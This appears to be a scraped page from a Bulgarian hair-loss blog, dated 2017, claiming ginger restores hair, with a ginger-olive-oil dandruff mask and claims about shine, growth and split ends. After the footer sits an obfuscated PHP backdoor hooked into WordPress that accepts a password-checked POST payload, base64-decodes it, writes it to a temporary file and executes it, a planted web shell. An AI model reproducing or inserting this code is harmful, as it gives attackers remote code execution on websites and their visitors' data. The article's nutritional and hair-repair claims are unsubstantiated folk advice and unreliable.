Джинджифилът връща към живот косата! Ето как го прави: | Косопад

Джинджифилът връща към живот косата! Ето как го прави:

Когато косата е в лошо състояние, ни кара да изглеждаме неподдържани и ни състарява. Можем да променим това съвсем лесно, само с продукти от собствената кухня.

Един от най- подходящите помощници за здрава и красива коса е джинджифилът. Повечето от нас го използват като подправка в ястията, но той има много повече свойства от кулинарните. Помага за възстановяването на косата, изтощена от лошо хранене, хормонални промени и замърсяването.

Джинджифилът е богат на протеини, калций, желязо, фолиева киселина, витамини, минерали, мастни киселини и аминокиселини. Поради тази причина е много полезен за косата.

Специалистите съветват да го включваме в храненето си, за да използваме всичките му полезни свойства. Също така, може да се използва и за приготвянето на различни видове маски за коса.

Как джинджифилът помага на косата

1. Елиминира пърхота
Никак не е приятно дрехите ни всеки ден да са наръсени с пърхот. За да го спрем, можем да приготвим домашна маска, със следните съставки: 2 лъжици пресен джинджифил, 3 лъжици зехтин, няколко капки лимонов сок.

2. Придава блясък
Цинкът и фосфорът, които се съдържат в него, възстановяват косата и я подсилват. Това помага за връщането на естествения блясък на косъма.

3. Ускорява растежа на косата
Джинджифилът увеличава кръвообращението по цялото тяло, включително и на скалпа. Това стимулира растежа и сгъстяването на косата.

4. Без цъфнали връхчета
Този проблем се появява при увреждане на кутикулата на косъма, заради излагането й на замърсяване или високи температури. Джинджифилът обаче съдържа вещества, които възстановяват здравия вид на косата.
За да имаме полза от джинджифила за косата си, трябва да го използваме два- три пъти седмично.

26. октомври 2017 16:46:06 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}